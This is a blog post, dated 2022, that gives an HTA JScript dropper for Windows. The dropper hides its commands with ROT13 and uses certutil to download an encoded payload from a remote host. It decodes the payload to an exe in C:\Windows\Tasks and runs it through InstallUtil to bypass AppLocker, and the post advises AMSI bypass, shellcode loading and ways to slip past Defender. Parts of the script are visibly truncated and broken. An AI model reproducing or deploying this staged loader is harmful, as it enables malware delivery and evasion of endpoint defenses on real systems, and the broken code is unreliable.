HTA JavaScript runner + AppLocker bypass

HTA Javascript with staged payload delivery + AppLocker bypass

HTA - embedded JavaScript

Create a binary to utilise with installutil, place the commands to run within the binary and compile. After compilation encode to a file (file.txt), using certutil -encode. The below script pulls file.txt, places it in c:\windows\tasks, decodes it back into an exe and then executes it with installutil.exe.

Within the compiled exe that is executed by installutil.exe place powershell commands that do something like bypass amsi and then reflectively load a grunt or shellcode embedded in a C# shellcode runner.

The obfuscation is simple but effective (ROT13):

HTA JavaScript runner

note: may have to run twice to get full execution, if it needs to be run only once modify to have a sleep timer to allow the file.txt to be decoded.


(new-object'') | IEX


// Delete out comments prior to delivery
<!DOCTYPE html>
<meta http-equiv="x-ua-compatible" content="IE=edge" />
<script language="JScript">

    var alph = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".split("");
    var ranalph = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm".split("");
    var num = "0123456789".split("");
    var sym = "/$:;-\\%#*&!. ".split("");
    //certutil.exe -urlcache -split -f 
    var sample = " preghgvy.rkr -heypnpur -fcyvg -s ";

    var scram = function(sample) {
	var result = "";
	for (var x=0; x<sample.length; x++) {
		for (var y=0; y<alph.length; y++) {
			if (sample[x]==alph[y]) {
        for (var s=0; s<sym.length; s++) {
            if(sample[x]==sym[s]) {
        for (var n=0; n<num.length; n++) {
            if(sample[x]==num[n]) {
	return result.toString();
    //stage 1 delivery
    str1 = scram(sample);
    sample = "Jfpevcg.furyy";
    wobj = scram(sample);
    // C:\\Windows\\Tasks\\file.txt
    sample = " P:\\Jvaqbjf\\Gnfxf\\svyr.gkg" //modify IP:PORT and payload as required;
    str2 = scram(sample);
    sample = "uggc://"
    str3 = scram(sample);

    //stage 2 setup
    // certutil -decode C:\\Windows\\Tasks\\file.txt C:\\Windows\\Tasks\\bp.exe
    sample = "preghgvy -qrpbqr P:\\Jvaqbjf\\Gnfxf\\svyr.gkg P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
    str4 = scram(sample);

    //stage 3 execution
    // C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\bp.exe
    sample = "P:\\Jvaqbjf\\Zvpebfbsg.ARG\\Senzrjbex64\\i4.0.30319\\VafgnyyHgvy.rkr /ybtsvyr= /YbtGbPbafbyr=snyfr /H P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
    str5 = scram(sample);

    var ex = new ActiveXObject(wobj);
	//%compspec% is an env var for cmd.exe, set t= sets an env variable containing the string http which defender was flagging on. 
    cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";
    cmd2 = str4;
    cmd3 = str5;

    var deploy = ex.Run(cmd);
    var deploy = ex.Run(cmd2);
    var deploy = ex.Run(cmd3);

<script language="JScript">
Written by Shain Lakin on 11 November 2022